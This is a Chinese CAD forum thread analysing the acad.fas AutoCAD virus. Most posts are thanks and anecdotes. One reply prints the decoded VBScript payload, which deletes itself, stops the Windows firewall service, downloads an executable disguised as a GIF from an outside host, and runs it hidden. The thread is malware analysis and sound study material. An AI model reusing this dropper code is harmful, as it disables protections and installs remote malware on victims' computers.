明经CAD社区

 找回密码
 注册

QQ登录

只需一步,快速开始

搜索
楼主: nonsmall

[【不死猫】] [不死猫出品] acad.fas 病毒原理破解分析和病毒脚本源码

    [复制链接]
发表于 2010-6-15 08:05 | 显示全部楼层
好贴
发表于 2010-7-3 13:57 | 显示全部楼层
老猫的贴一定要回的
发表于 2010-7-3 17:18 | 显示全部楼层

多谢,学习了

 

发表于 2010-7-7 23:20 | 显示全部楼层

这种病毒还会格盘?目前还没碰到

危害太大了,

下了学习一下,谢谢分享了

发表于 2010-9-12 23:57 | 显示全部楼层
拜倒
发表于 2010-9-14 06:33 | 显示全部楼层

这种病毒遇上很麻烦,上次遇上请人从windows和注册里面清除,才解决。

谢谢楼主的分享

发表于 2010-10-11 15:10 | 显示全部楼层
下载看看,学习一下
发表于 2011-3-8 20:58 | 显示全部楼层
太强了!
发表于 2011-3-30 14:14 | 显示全部楼层
不懂楼主有没有发现
假设一台未中CAD病毒的电脑,拷进1个文件夹后(包含病毒和DWG文件)
用两种方法打开,一种会中毒,一种不会。
1:会中毒
这种方法就是:::直接打开DWG
2:不会中毒
这种方法是先启动CAD,再打开病毒目录下的DWG。
所以,不懂你的图纸目录下有没有病毒,只要你养成习惯,先启动CAD,再打开图纸,都不会中毒

点评

都会中毒  发表于 2011-10-18 06:33
发表于 2011-9-24 10:58 | 显示全部楼层
本帖最后由 cabinsummer 于 2011-9-24 11:02 编辑

其实这个脚本文件加密不是很复杂,就是每个字符与23异或做成加密
  1. On Error Resume Next
  2. Set objFSO = CreateObject("Scripting.FileSystemObject")
  3. objFSO.DeleteFile WScript.ScriptFullName, True
  4. wscript.sleep 300000
  5. createObject("wscript.shell").Run "cmd.exe /C net stop sharedaccess", 0, True
  6. wscript.sleep 1200000
  7. SavePth = LCase("c:\windows\web\logo.exe")
  8. If objFSO.FileExists (SavePth) Then objFSO.DeleteFile (SavePth) End If
  9. Set xPost = CreateObject("Microsoft.XMLHTTP")
  10. xPost.Open "GET","http://www.cadgs.com/z/logo.gif",0
  11. xPost.Send()
  12. Set sGet = CreateObject("ADODB.Stream")
  13. sGet.Mode = 3
  14. sGet.Type = 1
  15. sGet.Open()
  16. sGet.Write(xPost.responseBody)
  17. sGet.SaveToFile "c:\windows\web\safemodelogo.gif",2
  18. objFSO.MoveFile "c:\windows\web\safemodelogo.gif" , SavePth
  19. If objFSO.GetFile (SavePth).size > 3000 Then CreateObject("Wscript.Shell").run SavePth, 0, true End If
  20. If objFSO.FileExists (SavePth) Then objFSO.DeleteFile (SavePth) End If
复制代码
您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|CAD论坛|CAD教程|CAD下载|联系我们|关于明经|明经通道 ( 粤ICP备05003914号 )  
©2000-2023 明经通道 版权所有 本站代码,在未取得本站及作者授权的情况下,不得用于商业用途

GMT+8, 2024-3-29 08:14 , Processed in 0.310114 second(s), 20 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表